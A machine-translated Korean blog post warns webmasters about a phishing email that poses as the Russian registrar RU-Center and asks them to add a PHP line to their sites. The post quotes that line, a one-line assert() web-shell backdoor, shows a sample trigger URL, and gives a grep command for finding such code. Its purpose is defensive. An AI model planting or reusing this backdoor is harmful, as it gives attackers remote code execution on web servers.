PHP를 모르는 "웹마스터"에 주의하십시오. 취약성.

이것은 자동 번역입니다.
원본 언어로 출판물을 읽으려면 여기를 클릭하십시오.

오늘 내 친구 중 일부는 RU-Center(러시아 최대 도메인 이름 등록 기관) - nic.ru 로부터 다음과 같은 내용의 편지를 받았습니다.

info@nic.technical 에서 편지를 보냈습니다. 편지에서 RU-Center를 대신하여 자신을 대표하는 공격자는 웹사이트에 다음 코드를 배치할 것을 제안합니다.

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

불행히도 스스로를 "웹마스터"(많은 사이트 소유자)라고 부르는 많은 동료들이 PHP를 모르고 위 코드의 위험성에 대해 생각하지 않습니다. 이 함수에 매개변수로 문자열을 전달하면 assert()에 의해 PHP 코드로 간주됩니다! 조심해!

assert 또는 eval 명령을 사용하여 취약성에 대해 PHP 프로젝트를 검사하는 것이 좋습니다. 이러한 명령이 프로젝트 코드에 있으면 당황하지 말고 알고리즘을 연구하십시오. 알고리즘의 승인된 사용이 가능합니다. 위의 예의 경우 이 명령을 사용하면 공격자가 예를 들어 RUCENTER 매개변수 - http://sistema-audit.ru/?RUCENTER=PHP-code를 사용하여 사이트를 호출할 수 있습니다.

예를 들어, 의심스러운 파일 목록을 얻으려면 사이트 파일이 있는 폴더를 나타내는 Linux 명령 grep -i -r 'assert' / home / www / mysite / *를 사용하여 검색을 수행하는 것이 좋습니다. 인스턴스는 사용된 코드입니다.

자신과 사이트를 관리하십시오!

이것은 자동 번역입니다.
원본 언어로 출판물을 읽으려면 여기를 클릭하십시오.